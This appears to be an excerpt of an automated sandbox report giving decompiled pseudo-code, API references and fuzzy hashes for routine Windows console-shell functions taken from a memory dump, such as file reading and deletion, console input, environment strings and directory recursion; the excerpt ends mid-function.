                                                    0x011e971b
                                                    0x011e971b
                                                    0x00000000
                                                    0x011e970f
                                                    0x011d5754
                                                    0x011d5754
                                                    0x011d5754
                                                    0x011d5757
                                                    0x011d575f
                                                    0x011d577f
                                                    0x011d578b
                                                    0x011d5795
                                                    0x011d5795
                                                    0x011d5795
                                                    0x011d5790
                                                    0x011d5790
                                                    0x011d576a
                                                    0x011e972e
                                                    0x011e9735
                                                    0x011e973b
                                                    0x011e973b
                                                    0x011e9735
                                                    0x011d5772
                                                    0x011d5773
                                                    0x011d5779
                                                    0x011d5779
                                                    0x011d574e

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011D5734
                                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F896D,00000021,?,?,00000000,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 011D573C
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011E96FE
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011E974A
                                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 011E9775
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                    • String ID:
                                                    • API String ID: 3588551418-0
                                                    • Opcode ID: f659bcab8664d38da087e5813f7fecc5e2366bad65e6bd2f27abcbf9ddb15866
                                                    • Instruction ID: 94303b79d4cea92381e1c686a523375f7286b7d0a4788e33adbbe26041e15c91
                                                    • Opcode Fuzzy Hash: f659bcab8664d38da087e5813f7fecc5e2366bad65e6bd2f27abcbf9ddb15866
                                                    • Instruction Fuzzy Hash: DA31B135A00506DBEF2CDF69E85C97A7BBAFB94259B624429E902C7294DF309C40CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E6A96, Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E011E6A96(short __ecx) {
				signed int _v8;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				long _v28;
				char _v32;
				int _v36;
				void _v556;
				long _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short _t34;
				short _t35;
				int _t38;
				WCHAR* _t39;
				void* _t50;
				short _t51;
				DWORD* _t52;
				signed int _t54;

				_t22 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t22 ^ _t54;
				_v32 = 1;
				_t52 = 0;
				_v28 = 0x104;
				_v36 = 0;
				_t51 = __ecx;
				memset( &_v556, 0, 0x104);
				if(E011E0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t34 = 0x3a;
					_v18 = _t34;
					_t35 = 0x5c;
					_v16 = _t35;
					_v14 = 0;
					_v20 = _t51;
					_t38 = GetDriveTypeW( &_v20);
					if(_t38 <= 1) {
						L8:
						_t52 = 1;
					} else {
						if(_t38 != 2 && _t38 != 5) {
							_t39 = _v36;
							if(_t39 == 0) {
								_t39 =  &_v556;
							}
							if(GetVolumeInformationW( &_v20, _t39, _v28,  &_v564, _t52, _t52, _t52, _t52) == 0) {
								if(GetLastError() == 5) {
									goto L8;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t52, 0x104, _v8 ^ _t54, _t50, _t51, _t52, _v36);
			}

























                                                    0x011e6aa1
                                                    0x011e6aa8
                                                    0x011e6ab3
                                                    0x011e6ab7
                                                    0x011e6ab9
                                                    0x011e6ac3
                                                    0x011e6ac8
                                                    0x011e6acb
                                                    0x011e6af1
                                                    0x011e6af5
                                                    0x011e6af6
                                                    0x011e6afc
                                                    0x011e6afd
                                                    0x011e6b03
                                                    0x011e6b0b
                                                    0x011e6b0f
                                                    0x011e6b18
                                                    0x011e6b71
                                                    0x011e6b73
                                                    0x011e6b1a
                                                    0x011e6b1d
                                                    0x011e6b24
                                                    0x011e6b29
                                                    0x011e6b69
                                                    0x011e6b69
                                                    0x011e6b46
                                                    0x011f156d
                                                    0x00000000
                                                    0x011f1573
                                                    0x011f156d
                                                    0x011e6b46
                                                    0x011e6b1d
                                                    0x011e6b18
                                                    0x011e6b4f
                                                    0x011e6b68

                                                    APIs
                                                    • memset.MSVCRT ref: 011E6ACB
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000000), ref: 011E6B0F
                                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 011E6B3E
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E6B4F
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$DriveInformationTypeVolume
                                                    • String ID:
                                                    • API String ID: 285405857-0
                                                    • Opcode ID: 56ff5f9e2a87cb4280d50d4b4de377f84d8b740715e64142e4a7bc93ea9d9610
                                                    • Instruction ID: 86f3d03b8a6e16212ce5322eb9d1fbbe6b5c0d355f4806a6a26269132e3a02a2
                                                    • Opcode Fuzzy Hash: 56ff5f9e2a87cb4280d50d4b4de377f84d8b740715e64142e4a7bc93ea9d9610
                                                    • Instruction Fuzzy Hash: 8C21A371E00118ABDF28DBE8DC4DAEFBBB8EF15754F44056AE505E3150EB359A40CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E0662, Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 24%
                                                    			E011E0662(signed short** __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t4;
				void* _t6;
				long _t8;
				signed int _t11;
				void* _t12;
				signed int _t15;
				long _t16;
				void* _t17;
				void* _t20;
				void* _t24;
				signed short** _t30;
				void* _t31;
				long _t33;
				void* _t34;
				signed int _t35;

				_push(__ecx);
				_t4 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t4 ^ _t35;
				_push(_t15);
				_t30 = __ecx;
				_t28 = 0x8000;
				_t19 =  *__ecx;
				_t6 = E011DD120( *__ecx, 0x8000, __ecx);
				_t16 = _t15 | 0xffffffff;
				while(1) {
					_t33 = _t6;
					if(_t33 != _t16) {
						break;
					}
					if( *0x1213cf0 != 2) {
						_t20 = 0x6e;
						E011F985A(_t20);
						goto L12;
					} else {
						_t11 =  *( *_t30) & 0x0000ffff;
						if(_t11 == 0x41 || _t11 == 0x42) {
							_t12 = E011DC5A2(_t19);
							_t24 = 0x2341;
							__imp___getch(0);
							if(_t12 == 3) {
								EnterCriticalSection( *0x1203858);
								 *0x11fd544 = 1;
								LeaveCriticalSection( *0x1203858);
								goto L12;
							} else {
								_t19 =  *_t30;
								_t28 = 0x8000;
								_t6 = E011DD120( *_t30, 0x8000, _t24);
								continue;
							}
						} else {
							_push(0);
							_push(0x236c);
							E011DC5A2(_t19);
							L12:
							_t8 = _t16;
						}
					}
					L3:
					_pop(_t31);
					_pop(_t34);
					_pop(_t17);
					return E011E6FD0(_t8, _t17, _v8 ^ _t35, _t28, _t31, _t34);
				}
				__imp___get_osfhandle(0);
				SetFilePointer(_t6, _t33, _t30[2], 0);
				_t8 = _t33;
				goto L3;
			}






















                                                    0x011e0667
                                                    0x011e0668
                                                    0x011e066f
                                                    0x011e0672
                                                    0x011e0675
                                                    0x011e0677
                                                    0x011e067d
                                                    0x011e067f
                                                    0x011e0684
                                                    0x011e0687
                                                    0x011e0687
                                                    0x011e068b
                                                    0x00000000
                                                    0x00000000
                                                    0x011ecb84
                                                    0x011ecbf6
                                                    0x011ecbf7
                                                    0x00000000
                                                    0x011ecb86
                                                    0x011ecb88
                                                    0x011ecb8e
                                                    0x011ecbac
                                                    0x011ecbb2
                                                    0x011ecbb3
                                                    0x011ecbbc
                                                    0x011ecbd6
                                                    0x011ecbe2
                                                    0x011ecbec
                                                    0x00000000
                                                    0x011ecbbe
                                                    0x011ecbbf
                                                    0x011ecbc1
                                                    0x011ecbc6
                                                    0x00000000
                                                    0x011ecbc6
                                                    0x011ecb95
                                                    0x011ecb95
                                                    0x011ecb97
                                                    0x011ecb9c
                                                    0x011ecbfc
                                                    0x011ecbfc
                                                    0x011ecbfc
                                                    0x011ecb8e
                                                    0x011e06a9
                                                    0x011e06ac
                                                    0x011e06ad
                                                    0x011e06b0
                                                    0x011e06b9
                                                    0x011e06b9
                                                    0x011e0699
                                                    0x011e06a1
                                                    0x011e06a7
                                                    0x00000000

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011E0699
                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D69F2,?,00000001,?,?,00000000), ref: 011E06A1
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: FilePointer_get_osfhandle
                                                    • String ID:
                                                    • API String ID: 1013686580-0
                                                    • Opcode ID: 3386d17ffc2c5c24d1f54361adbaf0be4cc72edb537c38a8cd2683ed2d2906a0
                                                    • Instruction ID: a71ef4aaead2248e08f059e014b95d27990d2079652d11dd5acb87c48134e80e
                                                    • Opcode Fuzzy Hash: 3386d17ffc2c5c24d1f54361adbaf0be4cc72edb537c38a8cd2683ed2d2906a0
                                                    • Instruction Fuzzy Hash: D7110232200606AFEB3CABACBC5DB2A7BE5EB58364F200519F105971C4CFA29980C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F7EC0, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 73%
                                                    			E011F7EC0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				struct _CHAR_INFO _v36;
				struct _COORD _v40;
				struct _SMALL_RECT _v48;
				signed int _t19;
				union %anon259 _t30;
				void* _t42;
				void* _t49;
				void* _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t50 = __edi;
				_t49 = __edx;
				_t42 = __ebx;
				_t19 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t19 ^ _t53;
				if(E011E0178(_t19 ^ _t53) != 0) {
					_push(__esi);
					_t52 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t52,  &_v32) != 0) {
						_v40.Y =  ~_v30;
						_v40.X = 0;
						_v48.Left = 0;
						_v48.Bottom = _v30;
						_v48.Right = _v32.dwSize;
						_t30 = 0x20;
						_v36.UnicodeChar = _t30;
						_v36.Attributes = _v32.wAttributes;
						ScrollConsoleScreenBufferW(_t52,  &_v48, 0, _v40,  &_v36);
						_v32.dwCursorPosition = 0;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0);
					} else {
						E011E25D9(0x11d3c88);
					}
					_pop(_t51);
				} else {
					E011E25D9(0x11d3c88);
				}
				return E011E6FD0(0, _t42, _v8 ^ _t53, _t49, _t50, _t51);
			}
















                                                    0x011f7ec0
                                                    0x011f7ec0
                                                    0x011f7ec0
                                                    0x011f7ec0
                                                    0x011f7ec8
                                                    0x011f7ecf
                                                    0x011f7edc
                                                    0x011f7eee
                                                    0x011f7ef7
                                                    0x011f7f06
                                                    0x011f7f1a
                                                    0x011f7f20
                                                    0x011f7f24
                                                    0x011f7f2b
                                                    0x011f7f35
                                                    0x011f7f39
                                                    0x011f7f3a
                                                    0x011f7f42
                                                    0x011f7f54
                                                    0x011f7f5f
                                                    0x011f7f69
                                                    0x011f7f08
                                                    0x011f7f0d
                                                    0x011f7f12
                                                    0x011f7f6f
                                                    0x011f7ede
                                                    0x011f7ee3
                                                    0x011f7ee8
                                                    0x011f7f7f

                                                    APIs
                                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F7EF1
                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 011F7EFE
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: BufferConsoleFileHandleInfoScreenType_get_osfhandle
                                                    • String ID:
                                                    • API String ID: 2847887402-0
                                                    • Opcode ID: 815e8209c4c19c277aeea599712e0ef134a3d18cd5f92f181ae0175ee7635e2a
                                                    • Instruction ID: e12c5198fc3f268a288462e2deeb706a6c92e8849a782baa7016f011173683a3
                                                    • Opcode Fuzzy Hash: 815e8209c4c19c277aeea599712e0ef134a3d18cd5f92f181ae0175ee7635e2a
                                                    • Instruction Fuzzy Hash: 0B212E7591420A9ACF14EFF4A918AFEB7B8EF1C614F10011AE915E7180EB349981876A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E46D8, Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011E46D8() {
				int _t3;
				signed int _t6;
				void* _t7;
				void* _t8;
				signed int _t10;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				void* _t18;

				_t3 = GetConsoleOutputCP();
				 *0x1203854 = _t3;
				if(GetCPInfo(_t3, 0x1203840) == 0) {
					_t6 = GetThreadLocale() & 0x000003ff;
					if(_t6 != 0x11) {
						if(_t6 == 4 || _t6 == 0x12) {
							 *0x1203846 = 0xfe81;
						} else {
							 *0x1203846 = 0;
						}
					} else {
						 *0x1203846 = 0xfce09f81;
						 *0x120384a = 0;
					}
				}
				_t7 = memset(0x1217f30, 0, 0x100);
				_t18 = _t17 + 0xc;
				if( *0x1203846 != 0) {
					_t15 = 0x1203846;
					while(1) {
						_t8 = _t15[1];
						if(_t8 == 0) {
							break;
						}
						_t13 =  *_t15 & 0x000000ff;
						_t10 = _t8 & 0x000000ff;
						if(_t13 <= _t10) {
							_t8 = memset(0x1217f30 + _t13, 1, _t10 - _t13 + 1);
							_t18 = _t18 + 0xc;
						}
						_t15 =  &(_t15[2]);
						if( *_t15 != 0) {
							continue;
						}
						break;
					}
					return _t8;
				} else {
					return _t7;
				}
			}












                                                    0x011e46d8
                                                    0x011e46e4
                                                    0x011e46f1
                                                    0x011ee8be
                                                    0x011ee8c7
                                                    0x011ee8e5
                                                    0x011ee8fb
                                                    0x011ee8ed
                                                    0x011ee8ed
                                                    0x011ee8ed
                                                    0x011ee8c9
                                                    0x011ee8c9
                                                    0x011ee8d3
                                                    0x011ee8d3
                                                    0x011ee8c7
                                                    0x011e4703
                                                    0x011e4708
                                                    0x011e4712
                                                    0x011ee90b
                                                    0x011ee910
                                                    0x011ee910
                                                    0x011ee915
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee917
                                                    0x011ee91a
                                                    0x011ee91f
                                                    0x011ee92e
                                                    0x011ee933
                                                    0x011ee933
                                                    0x011ee936
                                                    0x011ee93c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee93c
                                                    0x011ee93f
                                                    0x011e4718
                                                    0x011e4718
                                                    0x011e4718

                                                    APIs
                                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(011E458C), ref: 011E46D8
                                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E46E9
                                                    • memset.MSVCRT ref: 011E4703
                                                    • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011EE8B8
                                                    • memset.MSVCRT ref: 011EE92E
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$ConsoleInfoLocaleOutputThread
                                                    • String ID:
                                                    • API String ID: 1263632223-0
                                                    • Opcode ID: e2dde94db979ae5bd27ea8495d7740b0ab37d297359a0251ed8715680f1c201f
                                                    • Instruction ID: 23d803f6c67ad00235022ed27ea3fdaad82514ab50e12a368eaad7b1648e3c5e
                                                    • Opcode Fuzzy Hash: e2dde94db979ae5bd27ea8495d7740b0ab37d297359a0251ed8715680f1c201f
                                                    • Instruction Fuzzy Hash: 4F118970D18A519FEB3EDF98B80D7713BC0BB10720F4802AAE5C15A58AF7A842C5C756
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F3BB0, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 63%
                                                    			E011F3BB0(void* __eflags) {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* _t7;
				signed short _t13;
				signed int _t14;
				void* _t15;
				void* _t22;
				void* _t23;

				_push(_t15);
				_push(_t15);
				_t23 = GetStdHandle(0xfffffff6);
				_t7 = E011DC108(_t15, 0x232b, 0, _t22);
				if(_t23 != 0) {
					if(E011E0178(_t7) == 0 || ( *0x1213aa0 & 0x00000001) == 0) {
						E011F3B11(_t23,  &_v8, 1,  &_v12);
					} else {
						_t13 = FlushConsoleInputBuffer(_t23);
						__imp___getch();
						_t14 = _t13 & 0x0000ffff;
						_v8 = _t14;
						if(_t14 == 3) {
							EnterCriticalSection( *0x1203858);
							 *0x11fd544 = 1;
							LeaveCriticalSection( *0x1203858);
						}
					}
				}
				E011E25D9(L"\r\n");
				return 0;
			}












                                                    0x011f3bb5
                                                    0x011f3bb6
                                                    0x011f3bc7
                                                    0x011f3bc9
                                                    0x011f3bd2
                                                    0x011f3bdd
                                                    0x011f3c30
                                                    0x011f3be8
                                                    0x011f3be9
                                                    0x011f3bef
                                                    0x011f3bf5
                                                    0x011f3bf8
                                                    0x011f3bff
                                                    0x011f3c07
                                                    0x011f3c13
                                                    0x011f3c1d
                                                    0x011f3c1d
                                                    0x011f3bff
                                                    0x011f3bdd
                                                    0x011f3c3a
                                                    0x011f3c46

                                                    APIs
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3BBA
                                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3BE9
                                                    • _getch.MSVCRT ref: 011F3BEF
                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3C07
                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3C1D
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                    • String ID:
                                                    • API String ID: 491502236-0
                                                    • Opcode ID: 286fea7131610a01551c214ef4a9d74bfa9301aa56eb28e935ab3ce3ac056a43
                                                    • Instruction ID: abd1d2d664a651f4f02b1e5ca1b83fe43c9fe2bf23d56590595e316bbb62bdb6
                                                    • Opcode Fuzzy Hash: 286fea7131610a01551c214ef4a9d74bfa9301aa56eb28e935ab3ce3ac056a43
                                                    • Instruction Fuzzy Hash: 0B01D832514255AFDB2DEB65BC1DBAA7BA9FB10324F00025EFA1682084DFB18A80C351
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E3AAE, Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011E3AAE() {
				int _t9;
				void* _t12;
				WCHAR* _t13;

				_t13 = GetEnvironmentStringsW();
				_t12 = 0;
				if(_t13 != 0) {
					_t9 = E011E3B00(_t13);
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t9);
					if(_t12 != 0) {
						memcpy(_t12, _t13, _t9);
					}
					FreeEnvironmentStringsW(_t13);
				}
				return _t12;
			}






                                                    0x011e3ab8
                                                    0x011e3aba
                                                    0x011e3abe
                                                    0x011e3ac8
                                                    0x011e3ada
                                                    0x011e3ade
                                                    0x011e3ae3
                                                    0x011e3ae8
                                                    0x011e3aec
                                                    0x011e3af2
                                                    0x011e3af7

                                                    APIs
                                                    • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                                    • memcpy.MSVCRT ref: 011E3AE3
                                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                                    • String ID:
                                                    • API String ID: 713576409-0
                                                    • Opcode ID: d1c4b641443313ddeaa8d7f896aaf08c0ccb79adb899698d60ed3f1e93d1757e
                                                    • Instruction ID: f84b0b0ddba6df0dee14cdd1735a99c968783b6c124e7ce4adbd897c6478f49f
                                                    • Opcode Fuzzy Hash: d1c4b641443313ddeaa8d7f896aaf08c0ccb79adb899698d60ed3f1e93d1757e
                                                    • Instruction Fuzzy Hash: 34E09273A0091167DA3166AE7C5CDAF6DAEEBD99657150058F91AC3204DF308CC246B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E5266, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 303COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E011E5266(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				int _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				char** _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void _v124;
				unsigned int _t115;
				void* _t123;
				intOrPtr _t129;
				void* _t138;
				signed int _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr _t146;
				void* _t147;
				intOrPtr _t152;
				intOrPtr _t162;
				char _t163;
				char* _t164;
				void* _t168;
				void* _t172;
				char* _t180;
				char* _t181;
				void* _t182;
				signed int _t183;
				signed int _t195;
				void* _t196;
				void* _t197;
				intOrPtr* _t198;
				intOrPtr _t203;
				intOrPtr _t204;
				intOrPtr _t210;
				signed int _t211;
				signed int _t216;
				signed int _t218;
				void* _t220;
				void* _t222;
				void* _t224;
				void* _t225;
				intOrPtr _t227;
				intOrPtr _t231;

				_t195 = __edx;
				_v20 = __edx;
				_t168 = __ecx;
				_v28 = 0;
				_v16 = 0;
				_t227 =  *0x11fd544; // 0x0
				if(_t227 != 0) {
					L47:
					return 1;
				}
				_t115 = _a12;
				_v8 = _t115;
				_t208 = _t115 >> 0x00000002 & 1;
				_t123 = E011E5590(__ecx, __edx, _a4, _a8, _t115 >> 0x00000002 & 1, _a16, _a20, _a24, _a28, _a32);
				if(_t123 == 0) {
					_v16 = 1;
					_t216 = _v8 & 0x00000001;
					L4:
					E011E0040( *((intOrPtr*)(_t168 + 0x18)));
					 *((intOrPtr*)(_t168 + 0x18)) = 0;
					_t231 =  *0x11fd544; // 0x0
					if(_t231 != 0) {
						goto L47;
					}
					if(_t216 == 0) {
						return 0;
					}
					memset( &_v76, 0, 0x30);
					_t225 = _t224 + 0xc;
					_t129 = E011E297B( *((intOrPtr*)(_t168 + 4)));
					_t172 = 0x10;
					_v72 = _t129;
					_t173 = E011E00B0(_t172);
					if(_t173 == 0) {
						L51:
						E011F9287(_t173);
						__imp__longjmp(0x120b8b8, 1);
						L52:
						_v56 = _t195;
						_t218 = _t195;
						L10:
						if( *0x11fd544 != 0) {
							goto L47;
						}
						_v12 = _t195;
						if(_v56 <= 0) {
							L38:
							E011E0040(_v48);
							E011E0040(_v52);
							E011E0040(_v64[1]);
							E011E0040(_v64);
							E011E0040(_v72);
							if(_t218 != 0 || _v16 != _t218) {
								return _t218;
							} else {
								_push(2);
								L41:
								_pop(_t138);
								return _t138;
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t180 = ".";
							_t210 =  *((intOrPtr*)(_v48 + _v12 * 4));
							_t37 = _t210 + 0x30; // 0x30
							_t140 = _t37;
							_v24 = _t140;
							while(1) {
								_t196 =  *_t140;
								if(_t196 !=  *_t180) {
									break;
								}
								if(_t196 == 0) {
									L17:
									_t141 = 0;
									L18:
									if(_t141 == 0) {
										goto L37;
									}
									_t181 = L"..";
									_t41 = _t210 + 0x30; // 0x30
									_t144 = _t41;
									while(1) {
										_t197 =  *_t144;
										if(_t197 !=  *_t181) {
											break;
										}
										if(_t197 == 0) {
											L24:
											_t145 = 0;
											L25:
											if(_t145 == 0) {
												goto L37;
											}
											if((_v8 & 0x00000002) != 0 || ( *(_t210 + 4) & 0x00000400) == 0) {
												L28:
												_t198 =  *((intOrPtr*)(_t168 + 4));
												_t51 = _t198 + 2; // 0x402
												_t182 = _t51;
												do {
													_t146 =  *_t198;
													_t198 = _t198 + 2;
												} while (_t146 != 0);
												_t211 = _v24;
												_t183 = _t211;
												_t195 = _t198 - _t182 >> 1;
												_t220 = _t183 + 2;
												do {
													_t147 =  *_t183;
													_t183 = _t183 + 2;
												} while (_t147 != _v28);
												_t55 = _t195 + 2; // 0x400
												_t185 = _t183 - _t220 >> 1;
												_t222 = _t55 + (_t183 - _t220 >> 1);
												if(_t222 > 0x7fe7) {
													_push(_t211);
													E011DC5A2(_t185, 0x400023d8, 2,  *((intOrPtr*)(_t168 + 4)));
													_push(0x6f);
													goto L41;
												}
												memset( &_v124, 0, 0x30);
												_t225 = _t225 + 0xc;
												_t173 = _t222 + _t222;
												_t152 = E011E00B0(_t222 + _t222);
												if(_t152 == 0) {
													goto L51;
												}
												_v120 = _t152;
												E011E51C9(_t152, _t222,  *((intOrPtr*)(_t168 + 4)), _t211);
												_v112 =  *((intOrPtr*)(_t168 + 0xc));
												_v116 =  *((intOrPtr*)(_t168 + 8));
												_v108 =  *((intOrPtr*)(_t168 + 0x10));
												_t218 = E011E5266( &_v124, _v20, _a4, _a8, _v8, _a16, _a20, _a24, _a28, _a32);
												E011E0040(_v100);
												_v100 = 0;
												E011E0040(_v96);
												_v96 = 0;
												E011E0040(_v120);
												_v120 = 0;
												if(_t218 == 0) {
													_v16 = 1;
													goto L37;
												}
												if(_t218 != 2) {
													if(_t218 != 0x6f && _t218 != 3) {
														_t162 =  *((intOrPtr*)(_v48 + _v12 * 4));
														if(( *(_t162 + 4) & 0x00000400) == 0) {
															goto L38;
														}
														if(( *(_t162 + 0x28) & 0x20000000) != 0) {
															goto L36;
														}
														if( *(_t162 + 0x28) != 0x8000000a) {
															goto L38;
														}
													}
												}
												L36:
												_t218 = 0;
												goto L37;
											} else {
